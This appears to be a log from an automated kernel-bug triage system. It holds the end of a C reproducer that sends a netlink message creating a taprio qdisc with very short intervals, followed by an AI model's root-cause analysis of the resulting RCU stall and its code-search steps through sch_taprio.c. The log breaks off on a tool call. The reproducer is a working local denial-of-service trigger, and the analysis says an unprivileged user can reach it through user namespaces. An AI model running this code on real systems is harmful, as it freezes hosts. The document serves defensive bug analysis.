syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {}
// socket arguments: [
// domain: socket_domain = 0x11 (8 bytes)
// type: socket_type = 0x800000003 (8 bytes)
// proto: int32 = 0x0 (4 bytes)
// ]
// returns sock
res = syscall(__NR_socket, /*domain=AF_PACKET*/0x11ul, /*type=SOCK_RAW|0x800000000*/0x800000003ul, /*proto=*/0);
if (res != -1)
r[0] = res;
// ioctl$ifreq_SIOCGIFINDEX_team arguments: [
// fd: sock (resource)
// cmd: const = 0x8933 (4 bytes)
// arg: ptr[out, ifreq_dev_t["team0", ifindex_team]] {
// ifreq_dev_t["team0", ifindex_team] {
// ifr_ifrn: buffer: {74 65 61 6d 30 00 00 00 00 00 00 00 00 00 00 00} (length 0x10)
// elem: ifindex_team (resource)
// pad = 0x0 (20 bytes)
// }
// }
// ]
memcpy((void*)0x200000000500, "team0\000\000\000\000\000\000\000\000\000\000\000", 16);
res = syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x8933, /*arg=*/0x200000000500ul);
if (res != -1)
r[1] = *(uint32_t*)0x200000000510;
// socket$netlink arguments: [
// domain: const = 0x10 (8 bytes)
// type: const = 0x3 (8 bytes)
// proto: netlink_proto = 0x0 (4 bytes)
// ]
// returns sock_netlink
res = syscall(__NR_socket, /*domain=*/0x10ul, /*type=*/3ul, /*proto=*/0);
if (res != -1)
r[2] = res;
// sendmsg$nl_route_sched arguments: [
// fd: sock_nl_route (resource)
// msg: ptr[in, msghdr_netlink[netlink_msg_route_sched]] {
// msghdr_netlink[netlink_msg_route_sched] {
// addr: nil
// addrlen: len = 0x0 (4 bytes)
// pad = 0x0 (4 bytes)
// vec: ptr[in, iovec[in, netlink_msg_route_sched]] {
// iovec[in, netlink_msg_route_sched] {
// addr: ptr[in, netlink_msg_route_sched] {
// union netlink_msg_route_sched {
// newqdisc: netlink_msg_t[const[RTM_NEWQDISC, int16], tcmsg[AF_UNSPEC], rtm_tca_policy] {
// len: len = 0xac (4 bytes)
// type: const = 0x24 (2 bytes)
// flags: netlink_msg_flags = 0xf0b (2 bytes)
// seq: int32 = 0x0 (4 bytes)
// pid: int32 = 0x0 (4 bytes)
// payload: tcmsg[AF_UNSPEC] {
// family: const = 0x0 (1 bytes)
// tcm__pad1: const = 0x0 (1 bytes)
// tcm__pad2: const = 0x12 (2 bytes)
// ifindex: ifindex (resource)
// tcm_handle: tcm_handle {
// minor: tcm_handle_offsets = 0x0 (2 bytes)
// major: tcm_handle_offsets = 0xfff2 (2 bytes)
// }
// tcm_parent: tcm_handle {
// minor: tcm_handle_offsets = 0xffff (2 bytes)
// major: tcm_handle_offsets = 0xffff (2 bytes)
// }
// tcm_info: tcm_handle {
// minor: tcm_handle_offsets = 0x0 (2 bytes)
// major: tcm_handle_offsets = 0x0 (2 bytes)
// }
// }
// attrs: array[rtm_tca_policy] {
// union rtm_tca_policy {
// qdisc_kind_options: union qdisc_kind_options {
// q_taprio: tca_kind_options_t["taprio", array[taprio_policy]] {
// TCA_KIND: nlattr_t[const[TCA_KIND, int16], string["taprio"]] {
// nla_len: offsetof = 0xb (2 bytes)
// nla_type: const = 0x1 (2 bytes)
// payload: buffer: {74 61 70 72 69 6f 00} (length 0x7)
// size: buffer: {} (length 0x0)
// pad = 0x0 (1 bytes)
// }
// TCA_OPTIONS: nlattr_t[const[TCA_OPTIONS, int16], array[taprio_policy]] {
// nla_len: offsetof = 0x7c (2 bytes)
// nla_type: const = 0x2 (2 bytes)
// payload: array[taprio_policy] {
// union taprio_policy {
// TCA_TAPRIO_ATTR_PRIOMAP: nlattr_t[const[TCA_TAPRIO_ATTR_PRIOMAP, int16], tc_mqprio_qopt] {
// nla_len: offsetof = 0x56 (2 bytes)
// nla_type: const = 0x1 (2 bytes)
// payload: tc_mqprio_qopt {
// num_tc: int8 = 0x2 (1 bytes)
// prio_tc_map: array[int8] {
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x1 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// }
// hw: int8 = 0x0 (1 bytes)
// count: array[int16] {
// int16 = 0x8 (2 bytes)
// int16 = 0x4 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x9 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x3 (2 bytes)
// int16 = 0x400 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// }
// offset: array[int16] {
// int16 = 0x0 (2 bytes)
// int16 = 0x8 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0xff (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// }
// }
// size: buffer: {} (length 0x0)
// pad = 0x0 (2 bytes)
// }
// }
// union taprio_policy {
// TCA_TAPRIO_ATTR_SCHED_CLOCKID: nlattr_t[const[TCA_TAPRIO_ATTR_SCHED_CLOCKID, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x5 (2 bytes)
// payload: int32 = 0x0 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
// union taprio_policy {
// TCA_TAPRIO_ATTR_SCHED_ENTRY_LIST: nlattr_tt[const[TCA_TAPRIO_ATTR_SCHED_ENTRY_LIST, int16:14], 0, 1, array[nlnest[TCA_TAPRIO_SCHED_ENTRY, array[entry_policy$taprio]]]] {
// nla_len: offsetof = 0x18 (2 bytes)
// nla_type: const = 0x2 (1 bytes)
// NLA_F_NET_BYTEORDER: const = 0x0 (0 bytes)
// NLA_F_NESTED: const = 0x1 (1 bytes)
// payload: array[nlattr_tt[const[TCA_TAPRIO_SCHED_ENTRY, int16:14], 0, 1, array[entry_policy$taprio]]] {
// nlattr_tt[const[TCA_TAPRIO_SCHED_ENTRY, int16:14], 0, 1, array[entry_policy$taprio]] {
// nla_len: offsetof = 0x14 (2 bytes)
// nla_type: const = 0x1 (1 bytes)
// NLA_F_NET_BYTEORDER: const = 0x0 (0 bytes)
// NLA_F_NESTED: const = 0x1 (1 bytes)
// payload: array[entry_policy$taprio] {
// union entry_policy$taprio {
// TCA_TAPRIO_SCHED_ENTRY_INTERVAL: nlattr_t[const[TCA_TAPRIO_SCHED_ENTRY_INTERVAL, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x4 (2 bytes)
// payload: int32 = 0x4000000 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
// union entry_policy$taprio {
// TCA_TAPRIO_SCHED_ENTRY_INTERVAL: nlattr_t[const[TCA_TAPRIO_SCHED_ENTRY_INTERVAL, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x4 (2 bytes)
// payload: int32 = 0x101 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
// }
// size: buffer: {} (length 0x0)
// }
// }
// size: buffer: {} (length 0x0)
// }
// }
// }
// size: buffer: {} (length 0x0)
// }
// }
// }
// }
// }
// }
// }
// }
// len: len = 0xac (8 bytes)
// }
// }
// vlen: const = 0x1 (8 bytes)
// ctrl: const = 0x0 (8 bytes)
// ctrllen: const = 0x0 (8 bytes)
// f: send_flags = 0x0 (4 bytes)
// pad = 0x0 (4 bytes)
// }
// }
// f: send_flags = 0x0 (8 bytes)
// ]
*(uint64_t*)0x2000000007c0 = 0;
*(uint32_t*)0x2000000007c8 = 0;
*(uint64_t*)0x2000000007d0 = 0x200000000780;
*(uint64_t*)0x200000000780 = 0x200000000800;
*(uint32_t*)0x200000000800 = 0xac;
*(uint16_t*)0x200000000804 = 0x24;
*(uint16_t*)0x200000000806 = 0xf0b;
*(uint32_t*)0x200000000808 = 0;
*(uint32_t*)0x20000000080c = 0;
*(uint8_t*)0x200000000810 = 0;
*(uint8_t*)0x200000000811 = 0;
*(uint16_t*)0x200000000812 = 0x12;
*(uint32_t*)0x200000000814 = r[1];
*(uint16_t*)0x200000000818 = 0;
*(uint16_t*)0x20000000081a = 0xfff2;
*(uint16_t*)0x20000000081c = -1;
*(uint16_t*)0x20000000081e = -1;
*(uint16_t*)0x200000000820 = 0;
*(uint16_t*)0x200000000822 = 0;
*(uint16_t*)0x200000000824 = 0xb;
*(uint16_t*)0x200000000826 = 1;
memcpy((void*)0x200000000828, "taprio\000", 7);
*(uint16_t*)0x200000000830 = 0x7c;
*(uint16_t*)0x200000000832 = 2;
*(uint16_t*)0x200000000834 = 0x56;
*(uint16_t*)0x200000000836 = 1;
*(uint8_t*)0x200000000838 = 2;
*(uint8_t*)0x200000000839 = 0;
*(uint8_t*)0x20000000083a = 0;
*(uint8_t*)0x20000000083b = 0;
*(uint8_t*)0x20000000083c = 0;
*(uint8_t*)0x20000000083d = 1;
*(uint8_t*)0x20000000083e = 0;
*(uint8_t*)0x20000000083f = 0;
*(uint8_t*)0x200000000840 = 0;
*(uint8_t*)0x200000000841 = 0;
*(uint8_t*)0x200000000842 = 0;
*(uint8_t*)0x200000000843 = 0;
*(uint8_t*)0x200000000844 = 0;
*(uint8_t*)0x200000000845 = 0;
*(uint8_t*)0x200000000846 = 0;
*(uint8_t*)0x200000000847 = 0;
*(uint8_t*)0x200000000848 = 0;
*(uint8_t*)0x200000000849 = 0;
*(uint16_t*)0x20000000084a = 8;
*(uint16_t*)0x20000000084c = 4;
*(uint16_t*)0x20000000084e = 0;
*(uint16_t*)0x200000000850 = 9;
*(uint16_t*)0x200000000852 = 0;
*(uint16_t*)0x200000000854 = 0;
*(uint16_t*)0x200000000856 = 0;
*(uint16_t*)0x200000000858 = 0;
*(uint16_t*)0x20000000085a = 0;
*(uint16_t*)0x20000000085c = 0;
*(uint16_t*)0x20000000085e = 0;
*(uint16_t*)0x200000000860 = 3;
*(uint16_t*)0x200000000862 = 0x400;
*(uint16_t*)0x200000000864 = 0;
*(uint16_t*)0x200000000866 = 0;
*(uint16_t*)0x200000000868 = 0;
*(uint16_t*)0x20000000086a = 0;
*(uint16_t*)0x20000000086c = 8;
*(uint16_t*)0x20000000086e = 0;
*(uint16_t*)0x200000000870 = 0;
*(uint16_t*)0x200000000872 = 0;
*(uint16_t*)0x200000000874 = 0;
*(uint16_t*)0x200000000876 = 0;
*(uint16_t*)0x200000000878 = 0;
*(uint16_t*)0x20000000087a = 0xff;
*(uint16_t*)0x20000000087c = 0;
*(uint16_t*)0x20000000087e = 0;
*(uint16_t*)0x200000000880 = 0;
*(uint16_t*)0x200000000882 = 0;
*(uint16_t*)0x200000000884 = 0;
*(uint16_t*)0x200000000886 = 0;
*(uint16_t*)0x200000000888 = 0;
*(uint16_t*)0x20000000088c = 8;
*(uint16_t*)0x20000000088e = 5;
*(uint32_t*)0x200000000890 = 0;
*(uint16_t*)0x200000000894 = 0x18;
STORE_BY_BITMASK(uint16_t, , 0x200000000896, 2, 0, 14);
STORE_BY_BITMASK(uint16_t, , 0x200000000897, 0, 6, 1);
STORE_BY_BITMASK(uint16_t, , 0x200000000897, 1, 7, 1);
*(uint16_t*)0x200000000898 = 0x14;
STORE_BY_BITMASK(uint16_t, , 0x20000000089a, 1, 0, 14);
STORE_BY_BITMASK(uint16_t, , 0x20000000089b, 0, 6, 1);
STORE_BY_BITMASK(uint16_t, , 0x20000000089b, 1, 7, 1);
*(uint16_t*)0x20000000089c = 8;
*(uint16_t*)0x20000000089e = 4;
*(uint32_t*)0x2000000008a0 = 0x4000000;
*(uint16_t*)0x2000000008a4 = 8;
*(uint16_t*)0x2000000008a6 = 4;
*(uint32_t*)0x2000000008a8 = 0x101;
*(uint64_t*)0x200000000788 = 0xac;
*(uint64_t*)0x2000000007d8 = 1;
*(uint64_t*)0x2000000007e0 = 0;
*(uint64_t*)0x2000000007e8 = 0;
*(uint32_t*)0x2000000007f0 = 0;
syscall(__NR_sendmsg, /*fd=*/r[2], /*msg=*/0x2000000007c0ul, /*f=*/0ul);
return 0;
}
Reply: **Analysis of the Bug**
The bug is an RCU stall (CPU lockup) in the `taprio` packet scheduler (`net/sched/sch_taprio.c`).
**Root Cause:**
The `taprio` qdisc uses an hrtimer (`advance_timer`) to advance through its schedule entries. When the timer fires, the `advance_sched()` function calculates the next expiration time by adding the `interval` of the next schedule entry to the current expiration time.
The kernel attempts to validate that the `interval` is large enough to transmit at least one minimum-sized Ethernet frame (`ETH_ZLEN`), which depends on the link speed of the network interface. However, on high-speed virtual interfaces like `veth` (which defaults to 10,000 Mbps), this minimum duration (`min_duration`) evaluates to a very small value (e.g., 48 nanoseconds).
An attacker can configure a taprio schedule with an `interval` slightly above this minimum (e.g., 257 ns). Because 257 ns is significantly smaller than the time it takes the CPU to execute `advance_sched()` and process the timer interrupt (which typically takes ~500 ns or more), the timer's expiration time advances slower than real time.
When the hrtimer subsystem processes expired timers in `__hrtimer_run_queues()`, it loops over all expired timers until their expiration time is in the future relative to a fixed `basenow` timestamp. Since `advance_sched()` only advances the timer by 257 ns per iteration, it takes millions of iterations to catch up to `basenow`. By the time the loop finishes, real time has advanced even further, causing the timer hardware to immediately fire another interrupt and repeat the process with an even larger gap. This permanently traps the CPU in softirq context, leading to an RCU stall and a complete system lockup.
**Security Impact:**
* **Exploitable:** No. This is purely a logic error resulting in an infinite loop. It does not cause memory corruption, out-of-bounds accesses, or use-after-free conditions, so it cannot be exploited for privilege escalation or arbitrary code execution.
* **Denial Of Service:** Yes. The bug permanently hogs a CPU core in an interrupt context, leading to RCU stalls, watchdog panics, and a complete system freeze.
* **Accessible From User Namespaces:** Yes. Configuring a qdisc requires the `CAP_NET_ADMIN` capability. An unprivileged user can obtain this capability by creating a new user namespace and a new network namespace. Inside this isolated environment, they can create a `veth` interface and attach the malicious taprio qdisc to it, crashing the host system.
* **Accessible From Unprivileged Processes:** No. Without user namespaces, a standard unprivileged process does not have the required `CAP_NET_ADMIN` capability to configure network schedulers.
|
| 6/2 |
2026/05/24 13:25 |
llm |
expert |
0m
Model:
Tokens:
input: 15768
output: 42
thoughts: 190
Thoughts: **Analyzing a Taprio Qdisc RCU Stall**
Okay, so I've got an RCU stall report, apparently stemming from `advance_sched` within `net/sched/sch_taprio.c`. The backtrace is pretty straightforward, pointing directly to line 986 in that file. It runs through the usual suspects for timer handling: `__run_hrtimer`, `__hrtimer_run_queues`, and ultimately `hrtimer_interrupt`. We're dealing with a timer issue here, most likely a race condition of some kind.
The reproducer is setting up a `taprio` qdisc on a `team0` interface. That gives me a good starting point. I need to dive into `advance_sched` and see what's happening on line 986, and how that interacts with the `team0` interface. The `taprio` qdisc is all about time-based scheduling, so the timer aspect of the backtrace makes perfect sense. My initial thought is it is related to a contention for a resource the timer is trying to manage. I'll focus on how `advance_sched` manipulates the data structures involved in the time-based scheduling, especially in the context of the team interface, which is a virtual interface, which in itself can introduce other complications. Let's see what's going on with the RCU usage in that function.
|
| 7/2 |
2026/05/24 13:25 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:advance_sched]
Results: map[SourceCode: 917: static enum hrtimer_restart advance_sched(struct hrtimer *timer)
918: {
919: struct taprio_sched *q = container_of(timer, struct taprio_sched,
920: advance_timer);
921: struct net_device *dev = qdisc_dev(q->root);
922: struct sched_gate_list *oper, *admin;
923: int num_tc = netdev_get_num_tc(dev);
924: struct sched_entry *entry, *next;
925: struct Qdisc *sch = q->root;
926: ktime_t end_time;
927: int tc;
928:
929: spin_lock(&q->current_entry_lock);
930: entry = rcu_dereference_protected(q->current_entry,
931: lockdep_is_held(&q->current_entry_lock));
932: oper = rcu_dereference_protected(q->oper_sched,
933: lockdep_is_held(&q->current_entry_lock));
934: admin = rcu_dereference_protected(q->admin_sched,
935: lockdep_is_held(&q->current_entry_lock));
936:
937: if (!oper)
938: switch_schedules(q, &admin, &oper);
939:
940: /* This can happen in two cases: 1. this is the very first run
941: * of this function (i.e. we weren't running any schedule
942: * previously); 2. The previous schedule just ended. The first
943: * entry of all schedules are pre-calculated during the
944: * schedule initialization.
945: */
946: if (unlikely(!entry || entry->end_time == oper->base_time)) {
947: next = list_first_entry(&oper->entries, struct sched_entry,
948: list);
949: end_time = next->end_time;
950: goto first_run;
951: }
952:
953: if (should_restart_cycle(oper, entry)) {
954: next = list_first_entry(&oper->entries, struct sched_entry,
955: list);
956: oper->cycle_end_time = ktime_add_ns(oper->cycle_end_time,
957: oper->cycle_time);
958: } else {
959: next = list_next_entry(entry, list);
960: }
961:
962: end_time = ktime_add_ns(entry->end_time, next->interval);
963: end_time = min_t(ktime_t, end_time, oper->cycle_end_time);
964:
965: for (tc = 0; tc < num_tc; tc++) {
966: if (next->gate_duration[tc] == oper->cycle_time)
967: next->gate_close_time[tc] = KTIME_MAX;
968: else
969: next->gate_close_time[tc] = ktime_add_ns(entry->end_time,
970: next->gate_duration[tc]);
971: }
972:
973: if (should_change_schedules(admin, oper, end_time)) {
974: /* Set things so the next time this runs, the new
975: * schedule runs.
976: */
977: end_time = sched_base_time(admin);
978: switch_schedules(q, &admin, &oper);
979: }
980:
981: next->end_time = end_time;
982: taprio_set_budgets(q, oper, next);
983:
984: first_run:
985: rcu_assign_pointer(q->current_entry, next);
986: spin_unlock(&q->current_entry_lock);
987:
988: hrtimer_set_expires(&q->advance_timer, end_time);
989:
990: rcu_read_lock();
991: __netif_schedule(sch);
992: rcu_read_unlock();
993:
994: return HRTIMER_RESTART;
995: }
SourceFile:net/sched/sch_taprio.c]
|
| 8/2 |
2026/05/24 13:25 |
llm |
expert |
0m
Model:
Tokens:
input: 17615
output: 47
thoughts: 795
Thoughts: **RCU Stall Investigation: Taprio Qdisc**
Okay, so the RCU stall is happening around `advance_sched`, or within it. The backtrace points directly to `spin_unlock(&q->current_entry_lock);` on line 986 of `sch_taprio.c`. Now, that's interesting. A spinlock unlock causing a stall... usually indicates some sort of contention, but if it's an RCU stall, that suggests CPU 1 might be stuck in a tight loop or not yielding properly, perhaps constantly processing hrtimers without letting the scheduler breathe. If `advance_sched` returns `HRTIMER_RESTART`, the hrtimer gets immediately restarted. If the `end_time` is somehow in the past or nearly instantaneous relative to the current time, we'd have a classic hrtimer firing loop!
Let's verify that the `hrtimer_set_expires(&q->advance_timer, end_time);` call is behaving as expected. The problem could stem from `end_time` not advancing correctly, maybe if `next->interval` is stuck at zero. Let's dig into the reproducer.
Aha! The reproducer is setting up a taprio qdisc. Looking at the nlattr structure, it looks like it's setting `TCA_TAPRIO_SCHED_ENTRY_INTERVAL` to 0x4000000 and 0x101. Wait, there are *two* entries? My gut says there could be some interaction there. Now, let's see how `taprio_parse_tc_entries` handles this situation... That seems the most likely place to start digging deeper.
|
| 9/2 |
2026/05/24 13:26 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:taprio_parse_tc_entries]
Results: map[SourceCode:1746: static int taprio_parse_tc_entries(struct Qdisc *sch,
1747: struct nlattr *opt,
1748: struct netlink_ext_ack *extack)
1749: {
1750: struct taprio_sched *q = qdisc_priv(sch);
1751: struct net_device *dev = qdisc_dev(sch);
1752: u32 max_sdu[TC_QOPT_MAX_QUEUE];
1753: bool have_preemption = false;
1754: unsigned long seen_tcs = 0;
1755: u32 fp[TC_QOPT_MAX_QUEUE];
1756: struct nlattr *n;
1757: int tc, rem;
1758: int err = 0;
1759:
1760: for (tc = 0; tc < TC_QOPT_MAX_QUEUE; tc++) {
1761: max_sdu[tc] = q->max_sdu[tc];
1762: fp[tc] = q->fp[tc];
1763: }
1764:
1765: nla_for_each_nested_type(n, TCA_TAPRIO_ATTR_TC_ENTRY, opt, rem) {
1766: err = taprio_parse_tc_entry(sch, n, max_sdu, fp, &seen_tcs,
1767: extack);
1768: if (err)
1769: return err;
1770: }
1771:
1772: for (tc = 0; tc < TC_QOPT_MAX_QUEUE; tc++) {
1773: q->max_sdu[tc] = max_sdu[tc];
1774: q->fp[tc] = fp[tc];
1775: if (fp[tc] != TC_FP_EXPRESS)
1776: have_preemption = true;
1777: }
1778:
1779: if (have_preemption) {
1780: if (!FULL_OFFLOAD_IS_ENABLED(q->flags)) {
1781: NL_SET_ERR_MSG(extack,
1782: "Preemption only supported with full offload");
1783: return -EOPNOTSUPP;
1784: }
1785:
1786: if (!ethtool_dev_mm_supported(dev)) {
1787: NL_SET_ERR_MSG(extack,
1788: "Device does not support preemption");
1789: return -EOPNOTSUPP;
1790: }
1791: }
1792:
1793: return err;
1794: }
SourceFile:net/sched/sch_taprio.c]
|
| 10/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 19623
output: 45
thoughts: 14
Thoughts: Okay, here's my summary, taking on the persona you requested:
**Digging into the `parse_taprio_schedule` Function**
Hmm, hold on a second. I'm getting a mental nudge... a subtle but persistent feeling that I need to zoom in on this `parse_taprio_schedule` function. It’s tugging at my attention. I know the overall architecture of this project, the data flow, the expected inputs and outputs, but something about this specific function feels… pivotal. It's the lynchpin, the crucial bit of logic that translates raw Taprio schedules into a format our system can actually *use*. I need to understand it at a granular level. I want to see exactly how it works. I need to get my hands dirty with the code. Let's see how that one is defined.
|
| 11/2 |
2026/05/24 13:26 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:parse_taprio_schedule]
Results: map[SourceCode:1126: static int parse_taprio_schedule(struct taprio_sched *q, struct nlattr **tb,
1127: struct sched_gate_list *new,
1128: struct netlink_ext_ack *extack)
1129: {
1130: int err = 0;
1131:
1132: if (tb[TCA_TAPRIO_ATTR_SCHED_SINGLE_ENTRY]) {
1133: NL_SET_ERR_MSG(extack, "Adding a single entry is not supported");
1134: return -ENOTSUPP;
1135: }
1136:
1137: if (tb[TCA_TAPRIO_ATTR_SCHED_BASE_TIME])
1138: new->base_time = nla_get_s64(tb[TCA_TAPRIO_ATTR_SCHED_BASE_TIME]);
1139:
1140: if (tb[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME_EXTENSION])
1141: new->cycle_time_extension = nla_get_s64(tb[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME_EXTENSION]);
1142:
1143: if (tb[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME])
1144: new->cycle_time = nla_get_s64(tb[TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME]);
1145:
1146: if (tb[TCA_TAPRIO_ATTR_SCHED_ENTRY_LIST])
1147: err = parse_sched_list(q, tb[TCA_TAPRIO_ATTR_SCHED_ENTRY_LIST],
1148: new, extack);
1149: if (err < 0)
1150: return err;
1151:
1152: if (!new->cycle_time) {
1153: struct sched_entry *entry;
1154: ktime_t cycle = 0;
1155:
1156: list_for_each_entry(entry, &new->entries, list)
1157: cycle = ktime_add_ns(cycle, entry->interval);
1158:
1159: if (cycle < 0 || cycle > INT_MAX) {
1160: NL_SET_ERR_MSG(extack, "'cycle_time' is too big");
1161: return -EINVAL;
1162: }
1163:
1164: new->cycle_time = cycle;
1165: }
1166:
1167: if (new->cycle_time < new->num_entries * length_to_duration(q, ETH_ZLEN)) {
1168: NL_SET_ERR_MSG(extack, "'cycle_time' is too small");
1169: return -EINVAL;
1170: }
1171:
1172: taprio_calculate_gate_durations(q, new);
1173:
1174: return 0;
1175: }
SourceFile:net/sched/sch_taprio.c]
|
| 12/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 20741
output: 44
thoughts: 55
Thoughts: **Analyzing the Scheduling Logic**
Okay, so I'm looking at this scheduling logic, specifically this `new->cycle_time < new->num_entries * length_to_duration(q, ETH_ZLEN)` check. My initial reaction is, "Hold on a second... what happens if `entry->interval` is actually zero?" That could throw a wrench in the whole calculation. I need to understand what happens in that edge case. The zero interval could break everything!
I need to investigate where `entry->interval` is set and what assumptions are being made. I suspect I need to step back and look at the `parse_sched_list` function. It seems like the most logical place to begin, to find where that value is initialized. I need to trace this back and see how that interval is being determined. Let's see if that clarifies the situation, or if there's a potential bug to root out here.
|
| 13/2 |
2026/05/24 13:26 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:parse_sched_list]
Results: map[SourceCode:1086: static int parse_sched_list(struct taprio_sched *q, struct nlattr *list,
1087: struct sched_gate_list *sched,
1088: struct netlink_ext_ack *extack)
1089: {
1090: struct nlattr *n;
1091: int err, rem;
1092: int i = 0;
1093:
1094: if (!list)
1095: return -EINVAL;
1096:
1097: nla_for_each_nested(n, list, rem) {
1098: struct sched_entry *entry;
1099:
1100: if (nla_type(n) != TCA_TAPRIO_SCHED_ENTRY) {
1101: NL_SET_ERR_MSG(extack, "Attribute is not of type 'entry'");
1102: continue;
1103: }
1104:
1105: entry = kzalloc(sizeof(*entry), GFP_KERNEL);
1106: if (!entry) {
1107: NL_SET_ERR_MSG(extack, "Not enough memory for entry");
1108: return -ENOMEM;
1109: }
1110:
1111: err = parse_sched_entry(q, n, entry, i, extack);
1112: if (err < 0) {
1113: kfree(entry);
1114: return err;
1115: }
1116:
1117: list_add_tail(&entry->list, &sched->entries);
1118: i++;
1119: }
1120:
1121: sched->num_entries = i;
1122:
1123: return i;
1124: }
SourceFile:net/sched/sch_taprio.c]
|
| 14/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 21590
output: 44
thoughts: 11
Thoughts: Okay, here's my interpretation of that thought process, tailored for an expert audience, and written in the first person:
**Analyzing `parse_sched_entry`**
Alright, time to dig in. The phrase "Let's check `parse_sched_entry`" immediately tells me we're focusing on that specific function. It implies we either need to:
* **Confirm its functionality:** We might be troubleshooting a scheduling issue, and this function is a likely culprit. We're going to examine its code to ensure it's behaving as expected.
* **Debug a specific error:** It could be that `parse_sched_entry` is throwing an exception or returning unexpected data, and we're zeroing in on it as the source.
* **Evaluate its role:** We might be reviewing the overall scheduler design, and checking its impact on the system.
* **Optimize its performance:** Perhaps there's a suspected bottleneck related to schedule entry parsing, and we need to verify.
* **Understand its mechanics:** Maybe we're familiarizing ourselves with the code or someone else's, and so we want to get a complete grasp of it.
|
| 15/2 |
2026/05/24 13:26 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:parse_sched_entry]
Results: map[SourceCode:1067: static int parse_sched_entry(struct taprio_sched *q, struct nlattr *n,
1068: struct sched_entry *entry, int index,
1069: struct netlink_ext_ack *extack)
1070: {
1071: struct nlattr *tb[TCA_TAPRIO_SCHED_ENTRY_MAX + 1] = { };
1072: int err;
1073:
1074: err = nla_parse_nested_deprecated(tb, TCA_TAPRIO_SCHED_ENTRY_MAX, n,
1075: entry_policy, NULL);
1076: if (err < 0) {
1077: NL_SET_ERR_MSG(extack, "Could not parse nested entry");
1078: return -EINVAL;
1079: }
1080:
1081: entry->index = index;
1082:
1083: return fill_sched_entry(q, tb, entry, extack);
1084: }
SourceFile:net/sched/sch_taprio.c]
|
| 16/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 22217
output: 44
thoughts: 11
Thoughts: Okay, here's my interpretation of that thought process, tailored for an expert audience, and written in the first person:
**Analyzing the `fill_sched_entry` Function**
Alright, time to dive in. Let's see... the text simply says "Let's check `fill_sched_entry`." That means my mental gears have just shifted to focusing on a function, likely within a scheduling system or a related module. Knowing the context, I immediately start running through my mental checklist: What's the purpose of this function? Based on the naming, it's probably responsible for populating or filling in the data for a scheduling entry. I need to refresh my memory on its exact arguments, the data structures it manipulates, and its side effects. Is it a core function, or a helper? Does it handle any locking or concurrency issues? What's the expected input format and how does it validate that input? I'll probably be thinking about error handling too: what happens if data is missing, invalid, or conflicts with existing entries? And of course, I'll be considering the potential for performance bottlenecks - is this a function that's frequently called, and if so, how can it be optimized? I'm anticipating some critical details to assess, to understand the broader context of its role within the system. Let's dig in.
|
| 17/2 |
2026/05/24 13:26 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:fill_sched_entry]
